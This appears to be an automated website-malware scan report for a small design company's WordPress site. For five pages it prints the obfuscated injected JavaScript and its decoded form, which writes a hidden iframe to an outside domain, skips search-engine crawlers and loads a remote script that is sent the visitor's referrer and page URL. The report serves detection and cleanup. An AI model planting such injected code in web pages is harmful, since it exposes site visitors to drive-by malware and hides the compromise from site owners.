Scanned pages/files
Request | Server response | Status |
http://pinksdesign.co.in/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 27 Jan 2015 16:30:31 GMT Location: http://www.pinksdesign.co.in/ Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.pinksdesign.co.in/xmlrpc.php | clean |
http://www.pinksdesign.co.in/ | 200 OK Content-Length: 32967 Content-Type: text/html | clean |
http://www.pinksdesign.co.in/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://www.pinksdesign.co.in/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.pinksdesign.co.in/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.46.0-2013.11.21 | 200 OK Content-Length: 14798 Content-Type: application/javascript | clean |
http://www.pinksdesign.co.in/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.6 | 200 OK Content-Length: 7691 Content-Type: application/javascript | clean |
http://pinksdesign.co.in/viagra-101.com | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Tue, 27 Jan 2015 16:30:38 GMT Pragma: no-cache Location: http://www.pinksdesign.co.in/viagra-101.com Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.pinksdesign.co.in/xmlrpc.php | clean |
http://www.pinksdesign.co.in/viagra-101.com | 404 Not Found Content-Length: 10218 Content-Type: text/html | clean |
http://www.pinksdesign.co.in/about/ | 200 OK Content-Length: 9247 Content-Type: text/html | clean |
http://www.pinksdesign.co.in/wp-includes/js/comment-reply.min.js?ver=3.8.5 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://www.pinksdesign.co.in/brochure-design/ | 200 OK Content-Length: 14367 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var O0I='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKPBTMfhCZslGaDRmblBHch5SSxAzXKsTXwsVKnQWYlh2JoUWbh50ZhRVeCNHduVWblxWR0V2ZuQnbl1Wdj9GZg0DIJFDMfBichZnC7kCTSVlL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPsJXdmcyKpIXZyJXZmVmcuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9YWZyZyJrcyav1zYyNHdld2Pv02bj5SZ0F2YzVnZi9Wet5SawF2LvoDc0RHanASPgMmcz5yTwEzXKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPg8EMx8FIyFmd7cSRzUSZtFmcml2LDNTJFNTJxQ0MlIXZkJ3biVWbhJnZwITJyQ0MlQHanlWZoBjMlEDRzUCa0RWa3BjMlIjMlEDRzUCZpNnRzUC Decoded script: var _escape='%3Ciframe%20src%3D%22http%3A//virtuoso-luxury.info/go.php%3Fsid%3D1%22%20width%3D20%20height%3D20%20frameborder%3D20%3E%3C/iframe%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};var I1l = document.createElement('script'); I1l.src = 'http: I1l.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OIl = document.getElementsByTagName('head')[0]; OIl.appendChild(I1l);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.pinksdesign.co.in/contact-us/ | 200 OK Content-Length: 9484 Content-Type: text/html | clean |
http://www.pinksdesign.co.in/flash-animation/ | 200 OK Content-Length: 11903 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1Ol='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKsFTSoQGbph2Qk5WZwBXYuwWSPpwOdBzWpcCZhVGangSZtFmTnFGV5J0c05WZtVGbFRXZn5CduVWb1N2bkBSPgwWSPBichZnC7kCTSVlL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPsJXdmcyKpIXZyJXZmVmcuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9YWZyZyJrcyav1zYyNHdld2Pv02bj5SZ0F2YzVnZi9Wet5SawF2LvoDc0RHanASPgMmcz5CbxkkC7kyJ0BXayN2cngCduVWblxWRlRXYlJ3YuQnbl1Wdj9GZg0DIsFTSgIXY2tTf7kCKrFWZyJ0egkCM94TKnUGb0JXdUdCKm9EelRmbp5CduV2ZBJXZzVnLy9GdhdWa2Fmbuc3bk5Wa3BCf8BCM94TKnQ3biVGbn92bHd Decoded script: var _escape='%3Ciframe%20src%3D%22http%3A//virtuoso-luxury.info/go.php%3Fsid%3D1%22%20width%3D20%20height%3D20%20frameborder%3D20%3E%3C/iframe%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};var I1l = document.createElement('script'); I1l.src = 'http: I1l.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OIl = document.getElementsByTagName('head')[0]; OIl.appendChild(I1l);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.pinksdesign.co.in/graphic-design/ | 200 OK Content-Length: 12550 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1Ol='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKsFTSoQGbph2Qk5WZwBXYuwWSPpwOdBzWpcCZhVGangSZtFmTnFGV5J0c05WZtVGbFRXZn5CduVWb1N2bkBSPgwWSPBichZnC7kCTSVlL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPsJXdmcyKpIXZyJXZmVmcuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9YWZyZyJrcyav1zYyNHdld2Pv02bj5SZ0F2YzVnZi9Wet5SawF2LvoDc0RHanASPgMmcz5CbxkkC7kyJ0BXayN2cngCduVWblxWRlRXYlJ3YuQnbl1Wdj9GZg0DIsFTSgIXY2tTf7kCKrFWZyJ0egkCM94TKnUGb0JXdUdCKm9EelRmbp5CduV2ZBJXZzVnLy9GdhdWa2Fmbuc3bk5Wa3BCf8BCM94TKnQ3biVGbn92bHd Decoded script: var _escape='%3Ciframe%20src%3D%22http%3A//virtuoso-luxury.info/go.php%3Fsid%3D1%22%20width%3D20%20height%3D20%20frameborder%3D20%3E%3C/iframe%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};var I1l = document.createElement('script'); I1l.src = 'http: I1l.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OIl = document.getElementsByTagName('head')[0]; OIl.appendChild(I1l);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.pinksdesign.co.in/logo-design/ | 200 OK Content-Length: 12858 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1Ol='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKsFTSoQGbph2Qk5WZwBXYuwWSPpwOdBzWpcCZhVGangSZtFmTnFGV5J0c05WZtVGbFRXZn5CduVWb1N2bkBSPgwWSPBichZnC7kCTSVlL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPsJXdmcyKpIXZyJXZmVmcuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9YWZyZyJrcyav1zYyNHdld2Pv02bj5SZ0F2YzVnZi9Wet5SawF2LvoDc0RHanASPgMmcz5CbxkkC7kyJ0BXayN2cngCduVWblxWRlRXYlJ3YuQnbl1Wdj9GZg0DIsFTSgIXY2tTf7kCKrFWZyJ0egkCM94TKnUGb0JXdUdCKm9EelRmbp5CduV2ZBJXZzVnLy9GdhdWa2Fmbuc3bk5Wa3BCf8BCM94TKnQ3biVGbn92bHd Decoded script: var _escape='%3Ciframe%20src%3D%22http%3A//virtuoso-luxury.info/go.php%3Fsid%3D1%22%20width%3D20%20height%3D20%20frameborder%3D20%3E%3C/iframe%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};var I1l = document.createElement('script'); I1l.src = 'http: I1l.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OIl = document.getElementsByTagName('head')[0]; OIl.appendChild(I1l);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.pinksdesign.co.in/logo_design/ | 200 OK Content-Length: 10046 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1Ol='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKsFTSoQGbph2Qk5WZwBXYuwWSPpwOdBzWpcCZhVGangSZtFmTnFGV5J0c05WZtVGbFRXZn5CduVWb1N2bkBSPgwWSPBichZnC7kCTSVlL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPsJXdmcyKpIXZyJXZmVmcuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9YWZyZyJrcyav1zYyNHdld2Pv02bj5SZ0F2YzVnZi9Wet5SawF2LvoDc0RHanASPgMmcz5CbxkkC7kyJ0BXayN2cngCduVWblxWRlRXYlJ3YuQnbl1Wdj9GZg0DIsFTSgIXY2tTf7kCKrFWZyJ0egkCM94TKnUGb0JXdUdCKm9EelRmbp5CduV2ZBJXZzVnLy9GdhdWa2Fmbuc3bk5Wa3BCf8BCM94TKnQ3biVGbn92bHd Decoded script: var _escape='%3Ciframe%20src%3D%22http%3A//virtuoso-luxury.info/go.php%3Fsid%3D1%22%20width%3D20%20height%3D20%20frameborder%3D20%3E%3C/iframe%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};var I1l = document.createElement('script'); I1l.src = 'http: I1l.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OIl = document.getElementsByTagName('head')[0]; OIl.appendChild(I1l);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.pinksdesign.co.in/logout/ | 200 OK Content-Length: 7733 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pinksdesign.co.in
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 27 Jan 2015 16:30:31 GMT
Location: http://www.pinksdesign.co.in/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.pinksdesign.co.in/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: pinksdesign.co.in
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 27 Jan 2015 16:30:31 GMT
Location: http://www.pinksdesign.co.in/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.pinksdesign.co.in/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pinksdesign.co.in
Referer: http://www.google.com/search?q=pinksdesign.co.in
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pinksdesign.co.in
Referer: http://www.google.com/search?q=pinksdesign.co.in
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pinksdesign.co.in
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pinksdesign.co.in/
Result: pinksdesign.co.in is not infected or malware details are not published yet.
Result: pinksdesign.co.in is not infected or malware details are not published yet.